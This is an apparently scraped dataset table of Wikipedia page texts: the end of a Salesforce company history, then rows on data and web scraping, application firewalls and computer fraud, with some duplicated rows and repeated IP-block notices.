12 In 2006, Salesforce launched IdeaExchange, a platform that allows customers to connect with company product managers. 13 In 2009, Salesforce passed $1 billion in annual revenue. 7 Also, in 2009, the company launched Service Cloud, an application that helps companies manage service conversations about their products and services. 14 In 2014, the company released Trailhead, a free online learning platform. 15 In October 2014, Salesforce announced the development of its Customer Success Platform. 16 In September 2016, Salesforce announced the launch of Einstein, an artificial intelligence platform that supports several of Salesforce's cloud services. 17 18 It reportedly acquired a 20 year license to be the exclusive business-oriented software company allowed to use Albert Einstein's likeness for $20 million. 19 In 2020, Salesforce joined the Dow Jones Industrial Average, replacing energy giant and Standard Oil-descendant ExxonMobil. 20 Salesforce's ascension to the Dow Jones was concurrent with that of Amgen and Honeywell. 5 Because the Dow Jones factors its components by market price, Salesforce was the largest technology component of the index at its accession. 21 Across 2020 and 2021, Salesforce saw some notable leadership changes; in February 2020, co-chief executive officer Keith Block stepped down from his position in the company. 22 Marc Benioff remained as chairman and chief executive officer. 23 In February 2021, Amy Weaver, previously the chief legal officer, became CFO. Former CFO Mark Hawkins announced that he would be retiring in October. 24 25 In November 2021, Bret Taylor was named vice chair and co-CEO of the company. 26 In December 2020, it was announced that Salesforce would acquire Slack for $27.7 billion, its largest acquisition to date. 27 The acquisition closed in July 2021. 28 Journalists covering the acquisition emphasized the price Salesforce paid for Slack, which was a 54% premium compared to Slack's market value. 29 better source needed In April 2022, "Salesforce.com, Inc. changed its legal name to "Salesforce, Inc. 30 In August 2022, Salesforce reported second-quarter earnings of $7.72 billion. Upon the German software firm SAP reporting its earnings for the same quarter totaling 7.52 Billion, a Acceleration Economy reported that Salesforce had surpassed SAP to become the world's largest enterprise software vendor. This mirrored Benioff's remarks in Salesforce's earnings call, where he stated he looked at "this quarter very much as kind of a milestone". 3 Salesforce announced a partnership with Meta Platforms in September 2022. The deal called for Meta's consumer application WhatsApp to integrate Salesforce's Customer 360 platform to allow consumers to communicate with companies directly. 31 In November 2022, Salesforce announced it would terminate employees in its sales organization. 32 Protocol reported that the company would likely eliminate some 2500 jobs. 33 In November 2022, Salesforce announced its co-CEO and vice chair, Bret Taylor, would be stepping down from his roles at the end of January 2023, with Benioff continuing to run the company and serve as board chair. Within the week, former Tableau CEO Mark Nelson and former Slack CEO Stewart Butterfield also announced their departures. When asked about the departures, Benioff stated, "people come and people go"; Salesforce's stock dropped to a 52 week low after Nelson's resignation. 34 35 36 37 In January 2023, the company announced a layoff of about 10%, or approximately 8,000 positions. According to Benioff, the company hired too aggressively during the COVID 19 pandemic and the increase in working from home led to the layoff. The company also reduced office space as part of the restructuring plan. 38 The same month brought an announcement from activist investor Elliott Management that it would acquire a "big stake" in the company. 39 In January 2024, Salesforce announced it was laying off 700 employees (about 1%) of its global staff. 40 In March 2024, Salesforce launched Einstein Copilot: Health Actions, a conversation assistant based on its earlier artificial intelligence platform Einstein. It will help with making appointments, referrals, and gathering patient information. 41 Salesforce offers several customer relationship management (CRM) services, including: Sales Cloud, 42 Service Cloud, 43 Marketing Cloud, 44 and Commerce Cloud and Platform. 44 Additional technologies include Slack. Salesforce's main services are for customer management. Other services include app creation, data integration and visualization, and training. 45 Salesforce Platform (formerly known as Force.com) is a platform as a service (PaaS) that allows developers to add applications to the main Salesforce.com application. 46 failed verification These applications are hosted on Salesforce.com's infrastructure. 47 Force.com applications are built using Apex, a proprietary Java-like programming language 48 to generate HTML originally via the "Visualforce" framework. Beginning in 2015 49 the "Lightning Components" framework has been supported. The Apex compiler was designed by James Spagnola. 50 As of 2014, the Force.com platform had 1.5 million registered developers according to Salesforce. 51 Launched in 2005, the Salesforce AppExchange is an online app store that allows users to sell third-party applications and consulting services. 52 53 As of 2021, the exchange has over 5,000 apps listed. 54 55 Launched in 2014, Trailhead is a free online learning platform with courses focused on Salesforce technologies. 56 57 15 Desk.com was a SaaS help desk and customer support product that was acquired by Salesforce for $50 million in 2011. 58 59 In March 2018, Salesforce announced that Desk.com would be consolidated with other services into Service Cloud Essentials. 60 Do.com was a cloud-based task management system for small groups and businesses, introduced in 2011, and discontinued in 2014. 61 62 63 Salesforce is headquartered in San Francisco in the Salesforce Tower. 64 Salesforce has 110 offices, including ones in Hong Kong, Israel, London, Paris, Sydney and Tokyo. 65 66 Standard Poor's added Salesforce to the S P 500 Index in September 2008. 67 In August 2020, S P Dow Jones Indices announced that Salesforce would replace ExxonMobil in the Dow Jones Industrial Average. 20 According to Marc Benioff, Salesforce corporate culture is based on the concept of Ohana. 68 In 2021, Cynthia Perry, a design research senior manager, resigned, alleging discrimination in the workplace and posting her resignation letter on LinkedIn. 69 On September 10, 2021, Benioff tweeted that the company is prepared to help any employee who wishes to move out of the state of Texas, following abortion legislation in Texas, announced on September 1, 2021. 70 For the fiscal year 2022, Salesforce reported revenue of US$26.49 billion, an increase of 25% year-over-year and 24% in constant currency. 71 Salesforce ranked 126 on the 2022 Fortune 500 list of the largest United States companies by revenue. 72 In 2008, Salesforce migrated from Sun Fire E25K servers with SPARC processors running Solaris, to Dell servers with AMD processors, running Linux. 74 In 2012, Salesforce announced plans to build a data center in the UK to handle European citizens' personal data. 75 The center opened in 2014. 76 In 2013, Salesforce and Oracle announced a nine-year partnership focusing on applications, platforms, and infrastructure. 77 In 2016, Salesforce announced that it will use Amazon Web Services hosting for countries with restrictive data residency requirements and where no Salesforce data centers are operating. 78 Salesforce has acquired many companies throughout its history. In 2006, Salesforce acquired Sendia, a mobile web service firm, for $15 million 79 and Kieden, an online advertising company. 80 In 2007, Koral, a content management service, was acquired. 81 In 2008, Salesforce acquired Instranet for $31.5 million. 82 In 2010, Salesforce acquired multiple companies, including Jigsaw, a cloud-based data service provider, for $142 million, 83 Heroku, a Ruby application platform-as-a-service, for $212 million, 84 and Activa Live Chat, a live chat software provider. 85 In 2011, Salesforce acquired Dimdim, a web conferencing platform, for $31 million, 86 Radian6, a social media tracking company, for $340 million, 87 and Rypple, a performance management software company. 88 Rypple became known as Work.com in 2012. 89 In 2012, Salesforce acquired Buddy Media, a social media marketer, for $689 million, 90 and GoInstant, a browser collaboration startup, for $70 million. 91 In 2013, Salesforce acquired ExactTarget, an email marketer, for $2.5 billion. 92 In 2014, Salesforce acquired RelateIQ, a data company, for $390 million. 93 In 2015, Salesforce acquired multiple companies for undisclosed sums, including Toopher, a mobile authentication company, 94 Tempo, an AI calendar app, 95 and MinHash, an AI platform. 96 The company also acquired SteelBrick, a software company, for $360 million. 97 In 2016, Salesforce spent over $5 billion in acquisitions. 98 Companies acquired included Demandware, a cloud-based provider of e-commerce services, for $2.8 billion 99 and Quip, a word processing app, for $750 million. 100 In 2017, the company acquired Sequence, a user experience design agency, for an undisclosed amount. 101 In 2018, Salesforce acquired several companies, including MuleSoft, a cloud service company, for $6.5 billion, 102 103 as well as Rebel, an email services provider, 104 and Datorama, an AI marketing platform, for undisclosed amounts. 105 Between 2019 and 2021, Salesforce made two of its largest acquisitions, with Salesforce completing its acquisition Tableau, a data visualization and analytics software company, for $15.7 billion 106 in 2019, and Slack Technologies, the developers of its namesake office messaging platform, for $27.7 billion in 2021. 107 Salesforce also made smaller acquisitions throughout 2019, 2020, and 2021, which included ClickSoftware for $1.35 billion, 108 consulting firm Acumen Solutions for $570 million, 109 CRM firm Vlocity for $1.33 billion, 22 privacy compliance startup Phennecs for $16.5 million, 110 and robotic process automation firm Servicetrace for an undisclosed amount. 111 Salesforce's most recent acquisition was Slack-bot maker Troops.ai, announced in May 2022, and expected to close in 2023. 112 In September 2023, Salesforce acquired Airkit.ai, a creator of AI-powered customer service applications and experiences. 113 In December 2023, Salesforce announced it would acquire Spiff, an automated commission management platform for an undisclosed amount. 114 In April 2024, the Wall Street Journal reported that Salesforce was in advanced talks to acquire Informatica at a price below its $11 billion market capitalization at the time. 115 The deal was later reported to have been abandoned. 116 In November 2007, a phishing attack compromised contact information on a number of Salesforce customers. Some customers then received phishing emails that appeared to be invoices from Salesforce. 117 118 Salesforce stated that "a phisher tricked someone into disclosing a password, but this intrusion did not stem from a security flaw in the salesforce.com application or database. 117 In 2017, at DEF CON, two security engineers were let go after giving a presentation on an internal project called MEATPISTOL. 119 The presenters were sent a message 30 minutes prior to the presentation telling them not to go on stage, but the message wasn't seen until after they finished. 119 120 The MEATPISTOL tool was anticipated to be released as open-source at the time of the presentation, but Salesforce did not release the code to developers or the public during the conference. 119 The terminated employees called on the company to open-source the software after being let go. 121 The not-for-profit organization Refugee and Immigrant Center for Education and Legal Services (RAICES) rejected a US$250,000 donation from Salesforce because the company has contracts with U.S. Customs and Border Protection. 122 In December 2019, the Institute on Taxation and Economic Policy found that Salesforce was one of 91 companies who "paid an effective federal tax rate of 0% or less" in 2018, as a result of the Tax Cuts and Jobs Act of 2017. Their findings were published in a report based on the 379 Fortune 500 companies that declared a profit in 2018. 123 In March 2019, Salesforce faced a lawsuit by 50 anonymous women claiming to be victims and survivors of sex trafficking, abuse, and rape. The suit alleges that the company profited from and helped build technology that facilitated sex trafficking on Backpage.com, a now defunct website. 124 In March 2021, a judge granted partial dismissal of the case, dismissing charges of negligence and conspiracy, but allowed the case to proceed regarding charges of sex trafficking. 125 In July 2021, Salesforce Japan faced a discrimination lawsuit from a former employee, according to Japanese legal media. 126 The firm declined to comment on the suit to the media. The ex-employee, who has Autism Spectrum Disorder and ADHD, claimed she was discriminated against because of her disability and terminated in the firm's Japan web marketing team. The suit alleged that the anonymous woman, as an employee at Salesforce Japan from 2018 to 2020, faced hate speech, microaggressions and rejection of reasonable accommodation from the manager. She alleged that her attempts to resolve the problem were met with pressure from HR and job coach. The lawsuit is still continuing in Tokyo district court. 127 128 In Japan, the legal disability quota for private companies is 2.3%. But Salesforce Japan has not met the quota and pay levy from 2009 to 2021 except 2017. In 2020 the firm did not report the number of disabled employees to Japanese labor official. Depending on the result of lawsuit, it is undeniable that the firm may face a risk of negative impact to disability hiring such as performance improvement plan on the disability employment act or disclosure as social punishment from the labor official. 129 In January 2023, Salesforce reported that 8,000 employees had been laid off as a result of over-hiring during the Covid lockdown and a global economic downturn. In March 2023, the Wall Street Journal reported that actor Matthew McConaughey was paid 10 million dollars yearly for his role as a "creative advisor and TV pitchman". American musician will.i.am was also cited to be on the company's payroll due to his "strong understanding of technology". 130 131 In 2009, Salesforce began investing in startups. 132 These investments became Salesforce Ventures, headed by John Somorjai 132 133 In September 2014, SFV set up Salesforce1 Fund, aimed at start-ups creating applications primarily for mobile phones. 134 In December 2018, Salesforce Ventures announced the launch of the Japan Trailblazer Fund, focused on Japanese startups. 135 In August 2018, Salesforce Ventures reported investments totaling over $1 billion in 275 companies, including CloudCraze (e-commerce), 136 Figure Eight (artificial intelligence), 137 Forter (online fraud prevention), 138 and FinancialForce (automation software). 139 In 2019, SFV's five largest investments—Domo (data-visualization software), SurveyMonkey (online survey software), Twilio (cloud-communication), Dropbox (cloud storage), and DocuSign (secure e-signature company)—accounted for nearly half of its portfolio. 140 In 2021, Salesforce announced that its investments had resulted in $2.17 Billion annual gain. 141 In June 2023 Salesforce increased the size of its Generative AI Fund for startups from $250 million to $500 million. 142 |
31 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20160305025808/http://www.thefreelibrary.com/American+Airlines,+FareChase+Settle+Suit.-a0103213546 | Page Link: Terms of use Copyright 2016 Farlex, Inc. Feedback For webmasters |
32 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=5 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
33 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-1 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
34 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=10 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
35 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:Articles_needing_additional_references_from_February_2011 | This category combines all articles needing additional references from February 2011 (2011 02) to enable us to work through the backlog more systematically. It is a member of Category:Articles needing additional references. The following 200 pages are in this category, out of approximately 1,225 total. This list may not reflect recent changes. |
36 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Application_firewall | An application firewall is a form of firewall that controls input output or system calls of an application or service. It operates by monitoring and blocking communications based on a configured policy, generally with predefined rule sets to choose from. The two primary categories of application firewalls are network-based and host-based. Gene Spafford of Purdue University, Bill Cheswick at AT T Laboratories, and Marcus Ranum described a third-generation firewall known as an application layer firewall. Marcus Ranum's work, based on the firewall created by Paul Vixie, Brian Reid, and Jeff Mogul, spearheaded the creation of the first commercial product. The product was released by DEC, named the DEC SEAL by Geoff Mulligan - Secure External Access Link. DEC's first major sale was on June 13, 1991, to Dupont. Under a broader DARPA contract at TIS, Marcus Ranum, Wei Xu, and Peter Churchyard developed the Firewall Toolkit (FWTK) and made it freely available under license in October 1993. 1 The purposes for releasing the freely available, not for commercial use, FWTK were: to demonstrate, via the software, documentation, and methods used, how a company with (at the time) 11 years experience in formal security methods, and individuals with firewall experience, developed firewall software; to create a common base of very good firewall software for others to build on (so people did not have to continue to "roll their own" from scratch); to "raise the bar" of firewall software being used. However, FWTK was a basic application proxy requiring the user interactions. In 1994, Wei Xu extended the FWTK with the Kernel enhancement of IP stateful filter and socket transparent. This was the first transparent firewall, known as the inception of the third generation firewall, beyond a traditional application proxy (the second generation firewall), released as the commercial product known as Gauntlet firewall. Gauntlet firewall was rated one of the top application firewalls from 1995 until 1998, the year it was acquired by Network Associates Inc, (NAI). Network Associates continued to claim that Gauntlet was the "worlds most secure firewall" but in May 2000, security researcher Jim Stickley discovered a large vulnerability in the firewall, allowing remote access to the operating system and bypassing the security controls. 2 Stickley discovered a second vulnerability a year later, effectively ending Gauntlet firewalls' security dominance. 3 Application layer filtering operates at a higher level than traditional security appliances. This allows packet decisions to be made based on more than just source destination IP Address or ports and can also use information spanning across multiple connections for any given host. Network-based application firewalls operate at the application layer of a TCP IP stack 4 and can understand certain applications and protocols such as File Transfer Protocol (FTP), Domain Name System (DNS), or Hypertext Transfer Protocol (HTTP). This allows it to identify unwanted applications or services using a non standard port or detect if an allowed protocol is being abused. 5 Modern versions of network-based application firewalls can include the following technologies: Web application firewalls (WAF) are a specialized version of a network-based appliance that acts as a reverse proxy, inspecting traffic before being forwarded to an associated server. A host-based application firewall monitors application system calls or other general system communication. This gives more granularity and control, but is limited to only protecting the host it is running on. Control is applied by filtering on a per process basis. Generally, prompts are used to define rules for processes that have not yet received a connection. Further filtering can be done by examining the process ID of the owner of the data packets. Many host-based application firewalls are combined or used in conjunction with a packet filter. 6 Due to technological limitations, modern solutions such as sandboxing are being used as a replacement of host-based application firewalls to protect system processes. 7 There are various application firewalls available, including both free and open source software and commercial products. Starting with Mac OS X Leopard, an implementation of the TrustedBSD MAC framework (taken from FreeBSD), was included. 8 The TrustedBSD MAC framework is used to sandbox services and provides a firewall layer, given the configuration of the sharing services in Mac OS X Leopard and Snow Leopard. Third-party applications can provide extended functionality, including filtering out outgoing connections by app. This is a list of security software packages for Linux, allowing filtering of application to OS communication, possibly on a by-user basis: These devices may be sold as hardware, software, or virtualized network appliances. Next-Generation Firewalls: Web Application Firewalls LoadBalancers: Others: |
37 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Web_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
38 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_fraud | Computer fraud is the use of computers, the Internet, Internet devices, and Internet services to defraud people or organizations of resources. 1 In the United States, computer fraud is specifically proscribed by the Computer Fraud and Abuse Act (CFAA), which criminalizes computer-related acts under federal jurisdiction and directly combats the insufficiencies of existing laws. 2 Types of computer fraud include: Phishing, social engineering, viruses, and DDoS attacks are fairly well-known tactics used to disrupt service or gain access to another's network, but this list is not inclusive. The Melissa Virus appeared on thousands of email systems on March 26, 1999. It was disguised in each instance as an important message from a colleague or friend. 4 The virus was designed to send an infected email to the first 50 email addresses on the users’ Microsoft Outlook address book. Each infected computer would infect 50 additional computers, which in turn would infect another 50 computers. The virus proliferated rapidly and exponentially, resulting in substantial interruption and impairment of public communications and services. Many system administrators had to disconnect their computer systems from the Internet. Companies such as Microsoft, Intel, Lockheed Martin and Lucent Technologies were forced to shut down their email gateways due to the vast amount of emails the virus was generating. The Melissa virus is the most costly outbreak to date, causing more than $400 million in damages to North American businesses. After an investigation conducted by multiple branches of government and law enforcement, the Melissa Virus Worm was attributed to David L. Smith, a 32 year-old New Jersey programmer, who was eventually charged with computer fraud. 5 Smith was one of the first people ever to be prosecuted for the act of writing a virus. He was sentenced to 20 months in federal prison and was fined $5,000. In addition, he was also ordered to serve three years of supervised release after completion of his prison sentence. The investigation involved members of New Jersey State Police High Technology Crime Unit, the Federal Bureau of Investigation (FBI), the Justice Department’s Computer Crime and Intellectual Property Section, and the Defense Criminal Investigative Service. |
